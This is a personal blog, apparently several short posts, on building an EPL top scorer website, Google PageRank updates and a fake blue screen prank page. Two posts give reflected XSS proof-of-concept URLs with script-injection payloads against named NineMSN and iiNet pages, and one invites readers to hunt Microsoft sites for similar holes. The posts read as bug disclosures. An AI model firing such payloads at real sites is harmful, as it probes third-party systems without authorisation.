After a lot of tweaking, I decided to try a totally new approach to the design using tables.
Now the design looks nice and works well when the window is resized. Not the best solution but this will help when the player boxed are added.
Hope to finish off this soon and release an early version and then work on things like a mobile platform if enough interest exists.
I have began developing the basic layout for the main page of the EPL top scorer website. There are some issues with the reflexive nature of the design but I hope to fix these quickly so that I can progress.
The pitch tiles probably need more work as well but are decent at this stage. I will hopefully begin working on the actual statistical boxes soon and setting up a database. In the mean time, I am continuing to work on the layout.
Here is a picture of the layout thus far (screenshot from Chrome):
Surprisingly enough, it appears like the Google Play website is not as secure as it seems. A few hours of investigation led to a few security flaws that I am looking into further.
I am doubtful that I will find a flaw but it would be great if I did manage to find my first on Google!
PS: The type of vulnerability I am suggesting exits is data leakage…user account details could also possible be displayed….
Will report back.
Due to the lack of good EPL top scorer sites I have decided to make my own. This is the current template I have. User statistics form are loaded in as soon as they are available. Results are instantly reflected on the website, minutes after players score. The top 10 players are listed on the first page but this number can be changed by the user. Some nice user statistics are displayed such as nationality, number, age. The goals are then displayed with assists. The methods of goals are also listed.
Compared to other available websites online, I believe this website will be one of the best as it is visually appealing informative, will be fast and will be updated very quickly.
Its time again!
It seems like Google has just recently updated their Pagerank values used in the toolbar.
You can check your websites and other website pageranks by searching for “Pagerank checkers” which can report back the toolbar Pagerank for any website.
It seems that this update has been a great one for bloggers and the general public even though most people have remained on roughly the same pagerank. Frankly, I was hoping that my Article Directory website would regain its PR5 status after being hacked but it seems like it is not there yet but hopefully that will change in the next update.
As always, remember that the Pagerank value is only one metric used by Google to rank your website. It is not the most important metric and Google recommend that you not worry about it and instead focus on providing much more better content to your users. Remember, that PageRank is always updating but is only reported back to users after a few months (typically 3-4 months). This is because Google do not want webmasters to be obsessed with their rank and how they compare with other websites. Work on your websites and good quality linkbacks will come naturally, which will give you a very good PageRank.
Anyway, I hope this update was a good one for you. Remember, that Google often reload some values as errors can occur. Earlier this year, Facebook was given PR0 and so the toolbar values were loaded a few days after the initial update. So be on the look up for any post-updates that may affect your website.
After browsing around on the NineMSN website for a little while (for about 10 minutes) I found a XSS vulnerability on a very common page. The NineMSN flights page is located here:
http://flights.ninemsn.com.au/
The page did not sanitise input from the depart and return input. The form was expecting a date but any string could be provided as input to execute an XSS attack.
Here is the vulnerability:
Vulnerable Code:
|
1 2 3 4 5 6 7 8 9 10 |
http://flights.ninemsn.com.au/flights/search
?wg_trip_type=true
&wg_origin=1
&wg_destination=1
&wg_outbound_date=12/10/2012
&wg_inbound_date=15/10/2012
&wg_from="><script>alert(/XSS from feild/)</script>
&wg_to="><script>alert(/XSS to feild/)</script>
&ts_code=1
&ddcurrency=1 |
This vulnerability has been reported and I have been added to the Microsoft Hall of Fame for October 2012.
Why not have a look around Microsoft’s websites and see if you can find one too.
Just made this little thing in my spare time.
Its a Fake Blue Screen of Death simulator that you can use to trick your friends. Try it out and be sure to give me some feedback!
Link: http://fakebsod.com
iiNet, a major ISP in Australia seems to be a little less secure than they claim they are. After merely searching for XSS vulnerabilities on their website for 5 minutes, I had found these two vulnerabilities. Two non-persistent vulnerabilities, one surprisingly located in iiNet’s main search page.
Here is the main search page vulnerability:
Code:
|
1 |
http://www.iinet.net.au/search/?q=%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&search=Search&scope=site |
This is another vulnerability on the iiNet Freezone main page:
Code:
|
1 |
http://freezone.iinet.net.au/index/search?searchValue="><script>alert(String.fromCharCode(88, 83, 83))</script>&submit.x=22&submit.y=15 |
I have reported the above vulnerabilities to iiNet and have gotten no response. Hopefully they will fix the vulnerabilities in the near future.
Welcome to my new website/blog.
I’ll be posting a lot of my content here so be sure to visit frequently.
Thanks!